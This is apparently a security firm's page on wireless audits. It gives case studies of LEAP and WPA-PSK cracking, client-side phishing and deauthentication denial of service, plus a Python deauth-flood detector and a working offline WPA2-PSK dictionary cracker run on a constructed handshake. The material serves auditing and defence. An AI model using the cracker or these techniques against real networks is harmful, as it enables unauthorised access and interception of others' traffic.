Wireless Audit

Wireless audits are performed by a specialist team present in the coverage zone of the wireless networks and devices of a company or organisation. They aim at discovering and eliminating vulnerabilities and misconfigurations that could allow abuse of wireless connectivity to gain unauthorised access to data, systems and networks, or to cause serious availability problems. These audits are especially critical for companies and organisations that

  • employ wireless networks for any business operations
  • actively use mobile/portable computers, including smartphones
  • have a previous history of wireless security incidents
  • are very cautious about information security and want to be sure that unauthorised wireless devices are not present, even if no wireless networks are officially deployed

The main objectives of a wireless audit are:

  • identifying threats and risks related to all forms of wireless connectivity within a company or organisation
  • assessing the separation between wireless and wired network environments
  • analysing the security of all wireless devices that belong to a company or organisation or are positioned within its premises
  • discovering misconfigurations and sources of interference that can have a negative impact on both wireless network security and quality of service
  • finding and eliminating undesirable wireless data leaks and privacy disclosures
  • suggesting appropriate remedies and fixes for all security and quality of service problems discovered

Description

It is vital to understand that a declared "absence" of wireless networks, or even their strict prohibition by the corporate security policy, does not make you immune to wireless attacks. First, modern portable computers and even smartphones support wireless connectivity, and often have it turned on by default without the owner's knowledge. If attackers successfully exploit it, they not only gain access to the vulnerable mobile computer and all the information it stores, transmits and receives, but can also use that computer to penetrate any wired network it is connected to. Second, because of the convenience wireless connectivity provides, employees often install access points at work without permission, or bring their own wireless-enabled laptops and PDAs into the office and connect them to internal networks. As a rule of thumb, such access points and mobile computers are usually completely unprotected. We therefore always recommend supplementing at least the internal audits with a brief wireless scan to discover unauthorised connectivity sources, even if the company management is fully confident that wireless security is a non-issue. Our experience says exactly the opposite.

Wireless security audits demand full understanding of all the specific technologies involved. The important knowledge areas range from the foundations of radio physics to wireless-specific encryption protocols and the latest wireless security industry standards and certifications. Having (and knowing how to operate!) all the necessary instruments is also crucial: spectrum analysers, RF power meters, antennas, reflectors, amplifiers, client hardware whose chipsets and drivers support the required software tools, and so on. Network reconnaissance becomes area reconnaissance: the auditors must determine and outline the coverage zones of all active wireless networks and devices discovered, and find and characterise all present sources of interference. These sources inevitably include networks and devices belonging to neighbouring companies, organisations and households. Signal strength, direction and noise levels are measured, "dead zones" are investigated, and the various radio-physical issues that can lead to connectivity problems are examined and resolved. The results of the wireless reconnaissance, including the positions of all discovered unauthorised hosts and radio interference sources, are carefully marked on the applicable maps and plans of the investigated buildings and grounds.

The discovery and analysis of wireless vulnerabilities and misconfigurations are centered on

  • investigating possible information leaks via wireless devices and networks and determining seriousness and the exact sources of these leaks
  • checking whether any unauthorised connectivity to corporate wireless networks is possible
  • evaluating all opportunities of establishing unauthorised links with separate wireless-enabled devices, including those not associated to any networks
  • finding and analysing security flaws in all wireless-enabled devices and appliances
  • checking whether the existing wireless and wired network separation mechanisms can be bypassed
  • analysing efficiency and stability of wireless intrusion detection and prevention systems, if deployed
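As an added illustration of the last point (evaluating a wireless intrusion detection or prevention system), and of the broadcast deauthentication denial of service described in the third case study below: the following Python example, written for this page and not taken from any audit tool, builds a few 802.11 management frames in their on-air layout (without FCS) and runs a simple sliding-window rate detector over a constructed capture. The frame layout is the standard 24-byte management header; the MAC addresses, timestamps, window and threshold are assumptions for the demonstration.

```python
import struct
from collections import defaultdict

BROADCAST = bytes.fromhex("ffffffffffff")
# 802.11 management-frame subtypes (frame type 0)
BEACON, DISASSOC, DEAUTH = 0x08, 0x0A, 0x0C


def build_mgmt_frame(subtype, da, sa, bssid, seq, body=b""):
    """Serialise a management frame: frame control, duration, addr1-3, sequence control, body.
    No FCS is appended; this is what a monitor-mode capture presents after the radiotap header."""
    fc = struct.pack("<H", subtype << 4)               # protocol 0, type 0 (management), flags 0
    seq_ctrl = struct.pack("<H", (seq & 0x0FFF) << 4)  # fragment number 0
    return fc + b"\x00\x00" + da + sa + bssid + seq_ctrl + body


def parse_frame(raw):
    """Parse the 24-byte MAC header of a management frame (the inverse of build_mgmt_frame)."""
    fc, = struct.unpack_from("<H", raw, 0)
    seq_ctrl, = struct.unpack_from("<H", raw, 22)
    return {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "da": raw[4:10], "sa": raw[10:16], "bssid": raw[16:22],
        "seq": seq_ctrl >> 4,
        "body": raw[24:],
    }


def detect_deauth_flood(captures, window=1.0, threshold=10):
    """captures: iterable of (timestamp_seconds, raw_frame).
    Flags any BSSID that emits >= threshold broadcast deauth/disassoc frames inside
    any `window`-second interval. Returns a list of (bssid, window_start, count)."""
    per_bssid = defaultdict(list)
    for ts, raw in captures:
        f = parse_frame(raw)
        if f["type"] == 0 and f["subtype"] in (DEAUTH, DISASSOC) and f["da"] == BROADCAST:
            per_bssid[f["bssid"]].append(ts)
    alerts = []
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append((bssid.hex(":"), times[start], end - start + 1))
                break
    return alerts


def sample_capture():
    """Constructed capture: normal beacons, one legitimate unicast deauth, then a spoofed flood."""
    ap = bytes.fromhex("001122334455")      # assumed AP BSSID
    client = bytes.fromhex("66778899aabb")  # assumed client MAC
    frames = [(i * 0.1, build_mgmt_frame(BEACON, BROADCAST, ap, ap, 100 + i)) for i in range(10)]
    # the AP kicking a single client (reason 3, station leaving) is ordinary behaviour, not an attack
    frames.append((0.35, build_mgmt_frame(DEAUTH, client, ap, ap, 110, struct.pack("<H", 3))))
    # attacker spoofing the AP: 40 broadcast deauths (reason 7) within 0.4 s, sequence counter restarted
    frames += [(2.0 + i * 0.01, build_mgmt_frame(DEAUTH, BROADCAST, ap, ap, i, struct.pack("<H", 7)))
               for i in range(40)]
    return frames


if __name__ == "__main__":
    for bssid, t0, n in detect_deauth_flood(sample_capture()):
        print(f"deauth flood from {bssid}: {n} broadcast frames within 1 s starting at t={t0:.2f}")
```

A production WIDS would also correlate such frames with the access point's own sequence-number counter (spoofed deauthentication frames rarely continue the AP's sequence) and with the AP's transmit power signature, but the rate-based check alone is enough to separate the flood from the single legitimate unicast deauthentication in the sample.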

The overwhelming majority of the methods and techniques needed to achieve the goals listed above require understanding of, and hands-on experience with, low-level wireless protocols and protection mechanisms. They cannot be applied by wired-network security professionals without prior specialised training in wireless networking and security.

  1. "Upgrade Enforcement".
    A large manufacturing plant used Cisco EAP-LEAP to authenticate its employees to the wireless network covering the factory warehouses, offices and machine rooms. An argument over whether the plant's IT department should spend the time and effort to upgrade to the newer and more secure Cisco EAP-FAST authentication protocol led to a request for an independent wireless security assessment. During the audit the EAP-LEAP credentials of several legitimate users were cracked (LEAP's MS-CHAP-based challenge/response is open to offline dictionary attacks on sniffed authentication exchanges), allowing successful network association and further gateway scans. Using directional antennas, the auditors were also able to connect to the network and perform various security tests from far outside the factory, avoiding detection by security guards and the perimeter CCTV systems. The reconnaissance phase of the assessment also uncovered several non-802.11 sources of interference that severely impaired wireless quality of service in certain warehouse storage areas. Wireless barcode readers were in regular use in these areas, and workers had previously reported their connectivity problems. The interference sources were pinpointed as elements of a distributed alarm sensor system deployed in the warehouses. The plant now uses EAP-FAST to authenticate its users and distribute WPA keys, and after the network reconfiguration all operating frequencies "polluted" by the alarm system sensors are carefully avoided.
  2. "A Phishing Trip".
    One of the largest multinational corporations asked our consultants to present on wireless client-side vulnerabilities and defences at its annual security conference. The attendees, themselves security or networking consultants and IT managers, were forewarned that the presentation would include live demonstrations of various client-side attacks, so out of caution they turned off the wireless support of their laptops and PDAs for the duration of the demonstrations. As our consultants were escorted out by security guards after the presentation, the corporation's CSO joined them for an after-talk discussion, and the same attacks were repeated in the CSO's presence outside the conference hall. As the attendees turned the wireless capabilities of their mobile hosts back on, multiple laptops were force-associated by the consultants, several login credentials were successfully phished, and other interesting data was captured. The CSO recorded the MAC addresses and usernames belonging to the owners of the laptops involved.
  3. "Risky Bids".
    A well-known hippodrome used a system to take real-time bets from gamblers' mobile computers connected over wireless links. The hippodrome's management was concerned about possible betting fraud and other malicious actions should the system's wireless protection mechanisms be compromised, and ordered a wireless security audit to establish whether unauthorised access was possible and to determine the best defences against potential wireless threats. The auditors found that the hippodrome's wireless networks were protected by WPA PSK (pre-shared key) and successfully cracked one of the keys, gaining access to the network it protected. They also demonstrated that massive wireless denial of service (DoS) attacks could be mounted using the networks' broadcast MAC addresses; such an attack could cause significant financial losses if attackers blocked the very possibility of placing bets electronically during a race. The audit report strongly advised that a single shared password for all users is unsafe, since rogue users holding the key can snoop on their neighbours' bets and modify them at will. In accordance with the auditors' recommendations, a transition from WPA PSK to the more secure WPA Enterprise mode (per-user authentication) was performed, and the access point firmware was updated to prevent broadcast-based DoS attacks. A few months later, a distributed wireless intrusion prevention system was deployed to monitor the hippodrome's networks and deflect hacking attempts.
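To show concretely why the report treats a shared pre-shared key as weak, the following Python example (added here; it is not the auditors' tooling) derives the WPA2-Personal PMK and PTK from a passphrase and the four-way handshake parameters, computes the EAPOL-Key MIC of a constructed handshake message 2, and runs an offline dictionary attack against that "captured" handshake. The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed for the demonstration; only the PBKDF2, PRF-512 and MIC computations follow the standard (RSN key descriptor version 2, HMAC-SHA1-128; version 1 would use HMAC-MD5).

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # EAPOL-Key MIC field: 4-byte 802.1X header + 77 bytes of key descriptor fields before it


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11 PRF: concatenated HMAC-SHA1(key, label | 0x00 | data | i), truncated to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK from the PMK, both MAC addresses and both nonces, each pair ordered as the standard requires."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_with_zeroed_mic, key_descriptor_version=2):
    """Key MIC over the whole EAPOL-Key frame with its MIC field zeroed. v1 = HMAC-MD5, v2 = HMAC-SHA1-128."""
    algo = hashlib.md5 if key_descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_with_zeroed_mic, algo).digest()[:16]


def build_eapol_key_msg2(snonce, key_data):
    """Four-way handshake message 2 (supplicant -> AP), RSN key descriptor, MIC field left zero."""
    body = (b"\x02"                                     # descriptor type: RSN
            + struct.pack(">H", 0x010A)                 # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + struct.pack(">H", 16)                     # key length (CCMP)
            + struct.pack(">Q", 1)                      # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # key nonce, key IV, key RSC, key ID
            + bytes(16)                                 # key MIC (filled in by make_handshake)
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # 802.1X version 1, type 3 (EAPOL-Key)


def make_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed 'capture' of what a sniffer sees: addresses, nonces and the MIC'd message 2."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP group/pairwise, PSK AKM
    msg2 = bytearray(build_eapol_key_msg2(snonce, rsn_ie))
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    msg2[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(ptk[:16], bytes(msg2))  # KCK is PTK[0:16]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": bytes(msg2)}


def crack_psk(hs, wordlist):
    """Offline dictionary attack: recompute the MIC for each candidate passphrase and compare with the captured one."""
    eapol = bytearray(hs["eapol"])
    captured_mic = bytes(eapol[MIC_OFFSET:MIC_OFFSET + 16])
    eapol[MIC_OFFSET:MIC_OFFSET + 16] = bytes(16)
    target = bytes(eapol)
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        ptk = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], target), captured_mic):
            return candidate
    return None


def demo():
    """Assumed network parameters; the 'captured' handshake comes from make_handshake, not a real sniffer."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    hs = make_handshake("Warehouse2004", "hippodrome-bets", aa, spa, anonce, snonce)
    return crack_psk(hs, ["password", "12345678", "Warehouse2004", "letmein1"])


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Two points follow from the code. The only per-network secret in the derivation is the passphrase, and PBKDF2 with 4096 iterations slows a dictionary attack but does not stop one against a weak key. And whoever already holds the PSK needs no cracking at all: with the PMK in hand, ptk_from_pmk applied to any other client's sniffed handshake yields that client's PTK, which is exactly why a key shared by every gambler lets one of them read the others' traffic, and why WPA Enterprise, where each authentication produces its own PMK, was the recommended fix.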